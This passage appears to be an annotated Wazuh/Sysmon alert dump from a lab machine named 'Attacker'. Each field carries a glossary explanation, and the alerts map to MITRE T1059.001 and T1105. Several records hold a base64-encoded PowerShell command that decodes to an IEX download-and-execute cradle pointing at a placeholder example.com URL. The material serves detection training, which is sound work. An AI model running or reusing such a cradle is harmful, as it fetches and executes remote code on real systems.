rule.firedtimes:  70
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534296.1582488
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:13.6116365Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284380
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:13.586 ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} ProcessId: 15472 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pfax4tpn.eqc.ps1 CreationUtcTime: 2025-04-24 22:38:13.586 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:13.586
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd54-680a-6c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15472
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pfax4tpn.eqc.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:13.586
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:19.057+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:19.057+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  67
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534299.1585257
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:16.7381749Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284469
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:15.366 ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} ProcessId: 15624 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} ParentProcessId: 15472 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:15.366
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd57-680a-6e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd54-680a-6c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15472
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:19.570+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:19.570+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  71
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534299.1593328
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:16.9762322Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284470
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:16.919 ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} ProcessId: 15624 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zanwxrjo.ewu.ps1 CreationUtcTime: 2025-04-24 22:38:16.916 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:16.919
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd57-680a-6e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zanwxrjo.ewu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:16.916
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:20.865+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:20.865+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  68
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534300.1596097
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:18.9901696Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284498
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:17.923 ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} ProcessId: 15800 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} ParentProcessId: 15624 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:17.923
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd59-680a-700b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd57-680a-6e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:21.940+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:21.940+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  72
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
